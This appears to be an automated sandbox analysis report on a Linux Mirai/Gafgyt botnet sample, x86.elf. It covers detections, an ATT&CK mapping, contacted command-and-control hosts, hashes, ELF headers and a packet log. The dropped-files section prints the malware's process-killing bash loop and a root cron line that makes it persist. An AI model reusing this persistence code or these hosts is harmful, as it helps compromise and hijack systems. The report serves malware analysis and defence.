      Source: /bin/busybox (PID: 5877)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/busybox (PID: 5883)Queries kernel information via 'uname': Jump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: x86.elf, type: SAMPLE
      Source: Yara matchFile source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: x86.elf, type: SAMPLE
      Source: Yara matchFile source: 5492.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5858.1.0000000008048000.0000000008064000.r-x.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      Command and Scripting Interpreter      		1
      Systemd Service      		1
      Systemd Service      		1
      Disable or Modify Tools      		1
      OS Credential Dumping      		1
      Security Software Discovery      		Remote ServicesData from Local System1
      Non-Standard Port      		Exfiltration Over Other Network Medium1
      Service Stop
      CredentialsDomainsDefault Accounts1
      Scheduled Task/Job      		1
      Scheduled Task/Job      		1
      Scheduled Task/Job      		2
      File and Directory Permissions Modification      		LSASS Memory1
      System Network Configuration Discovery      		Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      Scripting      		Logon Script (Windows)1
      Hidden Files and Directories      		Security Account Manager1
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Disable or Modify System Firewall      		NTDS1
      System Information Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      File Deletion      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

      Malware Configuration

      No configs have been found

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526774 Sample: x86.elf Startdate: 06/10/2024 Architecture: LINUX Score: 96 102 octopus1337.geek 156.238.224.214, 34156, 34158, 34160 XHOSTSERVERUS Seychelles 2->102 104 212.118.43.167, 2222, 34872 CITYLAN-ASRU Russian Federation 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 Multi AV Scanner detection for submitted file 2->108 110 Yara detected Mirai 2->110 112 Machine Learning detection for sample 2->112 11 x86.elf 2->11         started        13 gvfsd-fuse fusermount 2->13         started        16 gnome-session-binary sh gsd-sharing 2->16         started        18 22 other processes 2->18 signatures3 process4 signatures5 20 x86.elf 11->20         started        22 x86.elf sh 11->22         started        24 x86.elf sh 11->24         started        26 10 other processes 11->26 120 Sample reads /proc/mounts (often used for finding a writable filesystem) 13->120 process6 process7 28 x86.elf 20->28         started        32 x86.elf 20->32         started        34 x86.elf 20->34         started        44 3 other processes 20->44 36 sh service systemctl 22->36         started        38 sh rm 24->38         started        40 sh service systemctl 26->40         started        42 sh rm 26->42         started        46 7 other processes 26->46 file8 100 /dev/ocmount, Bourne-Again 28->100 dropped 122 Manipulation of devices in /dev 28->122 48 x86.elf 28->48         started        50 x86.elf sh 28->50         started        60 4 other processes 28->60 54 x86.elf sh 32->54         started        62 4 other processes 32->62 124 Sample tries to kill multiple processes (SIGKILL) 34->124 126 Tries to stop the "iptables" service 36->126 56 service 36->56         started        64 3 other processes 36->64 128 Sample deletes itself 38->128 66 4 other processes 40->66 58 x86.elf 44->58         started        signatures9 process10 file11 68 x86.elf sh 48->68         started        70 x86.elf sh 48->70         started        72 x86.elf sh 48->72         started        77 2 other processes 48->77 98 /etc/cron.d/mount.sh, ASCII 50->98 dropped 114 Sample tries to persist itself using cron 50->114 74 sh iptables 54->74         started        79 2 other processes 56->79 81 3 other processes 60->81 83 4 other processes 62->83 85 2 other processes 66->85 signatures12 process13 signatures14 87 sh iptables 68->87         started        90 sh busybox 70->90         started        92 sh busybox 72->92         started        118 Executes the "iptables" command to insert, remove and/or manipulate rules 74->118 94 sh 77->94         started        96 sh 77->96         started        process15 signatures16 116 Executes the "iptables" command to insert, remove and/or manipulate rules 87->116

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      x86.elf55%ReversingLabsLinux.Backdoor.Gafgyt
      x86.elf36%VirustotalBrowse
      x86.elf100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      /dev/ocmount0%ReversingLabs

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      octopus1337.geek
      		156.238.224.214
      		truefalse
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        156.238.224.214
        		octopus1337.geekSeychelles
        		394281XHOSTSERVERUSfalse
        212.118.43.167
        		unknownRussian Federation
        		25308CITYLAN-ASRUfalse

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        156.238.224.214arm7.elfGet hashmaliciousMiraiBrowse
          212.118.43.167arm7.elfGet hashmaliciousMiraiBrowse
            0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
              lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                  DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                    9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                      ceKWlceqnf.elfGet hashmaliciousUnknownBrowse
                        ULDAb4NYKK.elfGet hashmaliciousUnknownBrowse
                          PAqN0mrUbb.elfGet hashmaliciousUnknownBrowse
                            TsjmK7qSlf.elfGet hashmaliciousUnknownBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              octopus1337.geekarm7.elfGet hashmaliciousMiraiBrowse
                              • 156.238.224.214
                              oc_x86_64.elfGet hashmaliciousMiraiBrowse
                              • 149.88.81.199
                              oc_aarch64.elfGet hashmaliciousUnknownBrowse
                              • 149.88.81.199
                              oc_mips.elfGet hashmaliciousUnknownBrowse
                              • 149.88.81.199
                              oc_i686.elfGet hashmaliciousMiraiBrowse
                              • 149.88.81.199
                              oc_arm7.elfGet hashmaliciousUnknownBrowse
                              • 149.88.81.199
                              oc_arm.elfGet hashmaliciousUnknownBrowse
                              • 149.88.81.199

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CITYLAN-ASRUarm7.elfGet hashmaliciousMiraiBrowse
                              • 212.118.43.167
                              file.exeGet hashmaliciousUnknownBrowse
                              • 88.210.6.42
                              file.exeGet hashmaliciousUnknownBrowse
                              • 88.210.6.42
                              0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                              • 212.118.43.167
                              lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                              • 212.118.43.167
                              uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                              • 212.118.43.167
                              DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                              • 212.118.43.167
                              9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                              • 212.118.43.167
                              ceKWlceqnf.elfGet hashmaliciousUnknownBrowse
                              • 212.118.43.167
                              h2LK6AsZ1I.exeGet hashmaliciousRisePro StealerBrowse
                              • 88.210.9.117
                              XHOSTSERVERUSarm7.elfGet hashmaliciousMiraiBrowse
                              • 156.238.224.214
                              https://tiktokmal1vip.com/Get hashmaliciousUnknownBrowse
                              • 156.238.242.50
                              https://tkglobalmall.vip/Get hashmaliciousUnknownBrowse
                              • 156.238.242.50
                              https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                              • 156.238.197.18
                              M46uio5ezW.exeGet hashmaliciousXWormBrowse
                              • 156.238.224.69
                              154.216.17.9-skid.arm-2024-08-04T06_22_56.elfGet hashmaliciousMirai, MoobotBrowse
                              • 156.254.22.232
                              154.216.17.9-skid.mpsl-2024-08-04T06_22_50.elfGet hashmaliciousMirai, MoobotBrowse
                              • 156.238.223.101
                              https://www.pnxubwf.cn/Get hashmaliciousUnknownBrowse
                              • 156.231.11.124
                              205.185.120.123-skid.arm5-2024-07-27T10_33_41.elfGet hashmaliciousMirai, MoobotBrowse
                              • 156.238.223.161
                              205.185.120.123-skid.sh4-2024-07-27T10_33_38.elfGet hashmaliciousMirai, MoobotBrowse
                              • 156.238.223.130

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              /dev/ocmountarm7.elfGet hashmaliciousMiraiBrowse
                                oc_i486.elfGet hashmaliciousMiraiBrowse
                                  oc_x86_64.elfGet hashmaliciousMiraiBrowse
                                    oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                      oc_mips.elfGet hashmaliciousUnknownBrowse
                                        oc_i686.elfGet hashmaliciousMiraiBrowse
                                          oc_arm7.elfGet hashmaliciousUnknownBrowse
                                            oc_mipsel.elfGet hashmaliciousUnknownBrowse
                                              oc_arm.elfGet hashmaliciousUnknownBrowse

                                                Created / dropped Files

                                                /dev/ocmount

                                                Download File
                                                Process:/tmp/x86.elf
                                                File Type:Bourne-Again shell script, ASCII text executable
                                                Category:dropped
                                                Size (bytes):479
                                                Entropy (8bit):4.026921351476117
                                                Encrypted:false
                                                SSDEEP:6:9rd/9GjuZZXegND07aW02vFgWccOHmAyCHOC1A9KiyhlrxleXUEMJJPJHeIHyHi5:rFGjuZog2+WvFgxq6DhllleXRW8ISCuU
                                                MD5:A3FC64B86B20A7B2EAA9330E1064D1F1
                                                SHA1:3A6F294C550A578D5E337F67FD4D9C1984EEA885
                                                SHA-256:6029DD069BC913653EEC32E54FB005A80FB71EBB5F0A584C71E06AC08FBBECE6
                                                SHA-512:CE26F2C6ECEC049B7053008E323018EC8A709942A456464A1D423F80B92BCA410D9B0F661093EB732254E6690900AC9A15B6F62450F72E6511195AEE403C50B6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: arm7.elf, Detection: malicious, Browse
                                                • Filename: oc_i486.elf, Detection: malicious, Browse
                                                • Filename: oc_x86_64.elf, Detection: malicious, Browse
                                                • Filename: oc_aarch64.elf, Detection: malicious, Browse
                                                • Filename: oc_mips.elf, Detection: malicious, Browse
                                                • Filename: oc_i686.elf, Detection: malicious, Browse
                                                • Filename: oc_arm7.elf, Detection: malicious, Browse
                                                • Filename: oc_mipsel.elf, Detection: malicious, Browse
                                                • Filename: oc_arm.elf, Detection: malicious, Browse
                                                Reputation:low
                                                Preview:#!/bin/bash..while true; do. cat /proc/$$/mountinfo | while read -r line; do. if [[ $line == *" /proc/"* ]]; then. if [[ $line != *"/boot"* ]]; then. PID=$(echo $line | grep -o "/proc/[0-9]*" | grep -o "[0-9]*"). PID=${PID#/proc/}. if [[ -n "$PID" ]]; then. echo "Found process the and kill pid: $PID". kill -9 $PID. fi. fi. fi. done. sleep 30.done.

                                                /etc/cron.d/mount.sh

                                                Download File
                                                Process:/bin/sh
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):38
                                                Entropy (8bit):3.8463189626846375
                                                Encrypted:false
                                                SSDEEP:3:3P11tKecVLE3Ov:ge7A
                                                MD5:67EC4A157E5B63970CFBB8CC55883AD7
                                                SHA1:5262B8C108DC3AEF69FCA6FFD959893DE852DC67
                                                SHA-256:0CB3CC915BB7492FF579F2B59237A5899088E5C5F238125AC9F0B5F73D2723E7
                                                SHA-512:EB6310992DC6E3AC1FCA2BCF26D82365494AA0ADBD80EE5EC6231B2418D1DAF6608F7820A560B4FBDA8C8885A59F8A82CA86AAA481F254D207926C1F6C5802B9
                                                Malicious:true
                                                Reputation:low
                                                Preview:* * * * * root /bin/bash /dev/ocmount.

                                                Static File Info

                                                General

                                                File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):6.003524975262088
                                                TrID:
                                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                File name:x86.elf
                                                File size:133'292 bytes
                                                MD5:99fc77d3b5e1fc2d3242ca25b4624389
                                                SHA1:3103f833991e51be8cdd434194383bd12c0b0a2f
                                                SHA256:376b7113fb1a872e9403c95d2930fcea98f90fb702500009ed0557d2df806785
                                                SHA512:fe0090c78f6e6667aa497997a8d149c553db250824f2cbbb1631348b6e95bb65dcf26c9be93a6f82ea9be9acdfcc4c66b9309e11555a69be4d183e9193f58fb4
                                                SSDEEP:1536:pPweXVTtNnJSbyGVV4v4Req2l4bycAzoZhIio5VL+8YunQwhCSaSz6miCDy:pxVTtNJM9kvjlGyTzGnoLWu5LQWy
                                                TLSH:EBD36C95F247C4F6EC2266716427B3368772E4261037EB97D7BDEE32EC11651CA2A20C
                                                File Content Preview:.ELF....................d...4...........4. ...(.....................H...H...............L...LO..LO...G..@...........Q.td............................U..S............h........[]...$.............U......=.....t..5.....O......O......u........t....hH?..........

                                                Static ELF Info

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:Intel 80386
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x8048164
                                                Flags:0x0
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:3
                                                Section Header Offset:132892
                                                Section Header Size:40
                                                Number of Section Headers:10
                                                Header String Table Index:9

                                                Sections

                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .initPROGBITS0x80480940x940x1c0x00x6AX001
                                                .textPROGBITS0x80480b00xb00x190f60x00x6AX0016
                                                .finiPROGBITS0x80611a60x191a60x170x00x6AX001
                                                .rodataPROGBITS0x80611c00x191c00x2d880x00x2A0032
                                                .ctorsPROGBITS0x8064f4c0x1bf4c0xc0x00x3WA004
                                                .dtorsPROGBITS0x8064f580x1bf580x80x00x3WA004
                                                .dataPROGBITS0x8064f800x1bf800x475c0x00x3WA0032
                                                .bssNOBITS0x80696e00x206dc0x48ac0x00x3WA0032
                                                .shstrtabSTRTAB0x00x206dc0x3e0x00x0001

                                                Program Segments

                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x80480000x80480000x1bf480x1bf486.56790x5R E0x1000.init .text .fini .rodata
                                                LOAD0x1bf4c0x8064f4c0x8064f4c0x47900x90400.34930x6RW 0x1000.ctors .dtors .data .bss
                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 6, 2024 15:52:21.350085020 CEST341568443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:21.354981899 CEST844334156156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:21.355052948 CEST341568443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:21.356422901 CEST341568443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:21.361265898 CEST844334156156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:21.361409903 CEST341568443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:21.366200924 CEST844334156156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:21.947186947 CEST844334156156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:21.947299004 CEST341568443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:21.952210903 CEST844334156156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:22.489418983 CEST341588443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:22.494451046 CEST844334158156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:22.494545937 CEST341588443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:22.494574070 CEST341588443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:22.499445915 CEST844334158156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:22.499511003 CEST341588443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:22.504347086 CEST844334158156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:22.952363968 CEST341608443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:22.957140923 CEST844334160156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:22.957221985 CEST341608443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:22.957221985 CEST341608443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:22.962042093 CEST844334160156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:22.962198973 CEST341608443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:22.966985941 CEST844334160156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:23.003442049 CEST348722222192.168.2.14212.118.43.167
                                                Oct 6, 2024 15:52:23.008362055 CEST222234872212.118.43.167192.168.2.14
                                                Oct 6, 2024 15:52:23.008429050 CEST348722222192.168.2.14212.118.43.167
                                                Oct 6, 2024 15:52:23.008429050 CEST348722222192.168.2.14212.118.43.167
                                                Oct 6, 2024 15:52:23.008429050 CEST348722222192.168.2.14212.118.43.167
                                                Oct 6, 2024 15:52:23.013310909 CEST222234872212.118.43.167192.168.2.14
                                                Oct 6, 2024 15:52:23.054439068 CEST222234872212.118.43.167192.168.2.14
                                                Oct 6, 2024 15:52:23.115617990 CEST844334158156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:23.115694046 CEST341588443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:23.120882034 CEST844334158156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:23.545610905 CEST844334160156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:23.545732021 CEST341608443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:23.550600052 CEST844334160156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:24.118329048 CEST341648443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:24.123164892 CEST844334164156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:24.123572111 CEST341648443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:24.123572111 CEST341648443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:24.128957033 CEST844334164156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:24.129019022 CEST341648443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:24.133863926 CEST844334164156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:24.734745979 CEST844334164156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:24.734839916 CEST341648443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:24.739634037 CEST844334164156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:44.370424032 CEST222234872212.118.43.167192.168.2.14
                                                Oct 6, 2024 15:52:44.370485067 CEST348722222192.168.2.14212.118.43.167
                                                Oct 6, 2024 15:52:49.570100069 CEST341668443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:49.575035095 CEST844334166156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:49.575102091 CEST341668443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:49.575126886 CEST341668443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:49.580240011 CEST844334166156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:49.580293894 CEST341668443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:49.585262060 CEST844334166156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:50.167754889 CEST844334166156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:50.167826891 CEST341668443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:50.172686100 CEST844334166156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:50.752966881 CEST341688443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:50.757874966 CEST844334168156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:50.757942915 CEST341688443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:50.757981062 CEST341688443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:50.763864040 CEST844334168156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:50.763931990 CEST341688443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:50.768774986 CEST844334168156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:51.177153111 CEST341708443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:51.182066917 CEST844334170156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:51.182122946 CEST341708443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:51.182142973 CEST341708443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:51.187005997 CEST844334170156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:51.187055111 CEST341708443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:51.191888094 CEST844334170156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:51.338165045 CEST844334168156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:51.338381052 CEST341688443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:51.343239069 CEST844334168156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:51.787612915 CEST844334170156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:51.787697077 CEST341708443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:51.792666912 CEST844334170156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:52.346813917 CEST341728443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.351721048 CEST844334172156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:52.351775885 CEST341728443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.351792097 CEST341728443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.356673002 CEST844334172156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:52.356738091 CEST341728443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.361543894 CEST844334172156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:52.788510084 CEST341748443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.793623924 CEST844334174156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:52.793694019 CEST341748443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.793718100 CEST341748443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.798619986 CEST844334174156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:52.798674107 CEST341748443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.803500891 CEST844334174156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:52.923738003 CEST844334172156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:52.923883915 CEST341728443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:52.928869963 CEST844334172156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:53.676767111 CEST844334174156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:53.676842928 CEST844334174156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:53.676884890 CEST341748443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:53.676913977 CEST341748443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:53.681749105 CEST844334174156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:53.925056934 CEST341768443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:53.929905891 CEST844334176156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:53.929972887 CEST341768443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:53.930000067 CEST341768443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:53.934808016 CEST844334176156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:53.934858084 CEST341768443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:53.939836025 CEST844334176156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:54.504744053 CEST844334176156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:54.504839897 CEST341768443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:54.509682894 CEST844334176156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:54.688009024 CEST341788443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:54.692872047 CEST844334178156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:54.692928076 CEST341788443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:54.692960024 CEST341788443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:54.697885036 CEST844334178156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:54.697947979 CEST341788443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:54.702795029 CEST844334178156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:55.290282965 CEST844334178156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:55.290370941 CEST341788443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:55.295439005 CEST844334178156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:55.515738964 CEST341808443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:55.520601034 CEST844334180156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:55.520684004 CEST341808443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:55.520966053 CEST341808443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:55.525729895 CEST844334180156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:55.525819063 CEST341808443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:55.530642033 CEST844334180156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:56.093245983 CEST844334180156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:56.093343973 CEST341808443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:56.098401070 CEST844334180156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:56.341386080 CEST341828443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:56.346277952 CEST844334182156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:56.346338034 CEST341828443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:56.346369028 CEST341828443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:56.351281881 CEST844334182156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:56.351349115 CEST341828443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:56.356223106 CEST844334182156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:56.927457094 CEST844334182156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:56.927572966 CEST341828443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:56.932454109 CEST844334182156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:58.227869034 CEST341848443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:58.232827902 CEST844334184156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:58.232901096 CEST341848443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:58.232944965 CEST341848443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:58.237859964 CEST844334184156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:58.237910032 CEST341848443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:58.242857933 CEST844334184156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:58.839689016 CEST844334184156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:58.839786053 CEST341848443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:58.844666004 CEST844334184156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:59.840569973 CEST341868443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:59.845529079 CEST844334186156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:59.845591068 CEST341868443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:59.845611095 CEST341868443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:59.850478888 CEST844334186156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:52:59.850528002 CEST341868443192.168.2.14156.238.224.214
                                                Oct 6, 2024 15:52:59.855359077 CEST844334186156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:00.441569090 CEST844334186156.238.224.214192.168.2.14
                                                Oct 6, 2024 15:53:00.441669941 CEST341868443192.168.2.14156.238.224.214
